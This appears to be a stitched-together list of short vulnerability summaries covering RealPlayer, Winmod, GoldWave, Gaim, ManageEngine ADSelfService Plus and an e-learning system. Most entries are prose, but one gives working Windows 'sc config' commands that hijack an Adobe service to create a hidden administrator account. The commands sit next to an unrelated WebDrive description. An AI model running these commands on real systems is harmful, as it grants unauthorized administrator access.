A local privilege escalation attack against the community-supported version of Real.com's RealPlayer, version 9. By default, configuration files are stored in ~$USER/.realnetworks/ and are group-writable. A malicious local user can edit the config files of fellow users to perform unauthorized actions. The attack involves modifying the path to shared libraries and writing malicious shared libraries.
This exploit targets the Winmod 1.4 (.lst) software on Windows XP SP3. It utilizes a stack overflow vulnerability to execute arbitrary code. The exploit overwrites the return address (RET) and structured exception handler (SEH) to gain control of the program. It then injects shellcode to execute a calculator application. The shellcode used in this exploit is based on the Metasploit framework.
A stored cross-site scripting vulnerability exists in the Responsive E-Learning System 1.0, which allows an attacker to inject malicious JavaScript code into the application. By exploiting this vulnerability, an attacker can gain access to the application and execute malicious code in the victim's browser.
The 'id=' parameter in Responsive E-Learning System is vulnerable to SQL injection.
A vulnerability in ManageEngine ADSelfService Plus could allow an unauthenticated, remote attacker to execute arbitrary code on a targeted system. The vulnerability exists due to insufficient validation of user-supplied data. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted system. A successful exploit could allow the attacker to execute arbitrary code on the system with the privileges of the web server process.
GoldWave 5.70 is vulnerable to a buffer overflow when a specially crafted file is opened. This can be exploited to execute arbitrary code by corrupting the SEH chain and overwriting the return address with a pointer to the malicious code. The vulnerability is triggered when a user opens the crafted file with the application.
The script injection vulnerability allows an attacker to inject malicious scripts into a webpage, which can be executed by the victim's browser. In this specific case, the vulnerability is present in both VBScript and JavaScript sections of the code.
This code demonstrates a stack overflow vulnerability in Gaim 1.2.1 when processing email addresses. It causes a segfault when executing the /vuln command in a conversation. If a protocol allows a 10002-character message to go through, it also segfaults the recipient. The vulnerability is due to the stack being overwritten with 'A's and the return address of the function being set to 0x41414141.
To exploit this issue, attackers require local, interactive access to an affected computer. The following example commands are available:
    sc stop "AdobeActiveFileMonitor8.0"
    sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
    sc start "AdobeActiveFileMonitor8.0"
    runas /noprofile /user:%COMPUTERNAME%\adobe cmd
The 'WebDrive Service' is installed with an empty security descriptor. A malicious user can stop the service, then invoke the 'sc config' command to replace the binary path with a value of choice, then restart the service to run the command with SYSTEM privileges.